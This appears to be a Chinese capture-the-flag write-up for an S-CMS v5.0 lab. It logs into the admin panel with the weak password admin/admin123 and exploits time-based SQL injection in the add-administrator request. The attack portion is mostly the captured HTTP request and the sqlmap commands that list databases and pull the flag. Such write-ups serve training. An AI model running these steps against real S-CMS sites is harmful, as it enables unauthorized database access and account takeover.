简介
S-CMS v5.0 被发现存在SQLI。
过程
打开靶场,扫描目录,发现/admin后台登陆界面
弱口令admin/admin123登录
经过查看,发现账号管理功能,添加管理员账号存在sql注入,添加管理员,进行抓包
抓取数据如下
POST /admin/ajax.php?type=admin&action=add&lang=0 HTTP/1.1
Host: eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: http://eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com/admin/
Cookie: count_all=0; authx=; userx=; passx=; user=admin; pass=7b19569b9317927e14152e312767a351; A_type=1; auth=1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1; newsauth=all; productauth=all; textauth=all; formauth=all; bbsauth=all; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718723953,1718802016,1718849866,1718896116; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1718896116; PHPSESSID=acfe9ecbc6e48d2e492b8169ab7da438
Priority: u=1
A_login=asd&A_pwd=asd&A_email=asd%40qq.com&A_type=1&A_a0=1&A_textauth%5B%5D=13&A_newsauth%5B%5D=107
放入sqlmap跑
python sqlmap.py -r ceshi.txt --dbs --batch
发现A_newsauth等四个参数均存在sql注入,跑 A_newsauth,存在时间注入
python sqlmap.py -r ceshi.txt -p A_newsauth%5B%5D -randomize=A_login --dbs --batch
查找flag
python sqlmap.py -r ceshi.txt -p A_newsauth%5B%5D -randomize=A_login --dbms mysql --sql-query "SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'flag' limit 2,1"
读取flag
python sqlmap.py -r ceshi.py -p A_newsauth%5B%5D -randomize=A_login --dbms mysql --sql-query "SELECT substring(flag,17,1) from scms.fllllaaaag"
得到flag{8ef3b98b-c8d2-4af1-82bf-a5ce95cd955e}
文章评论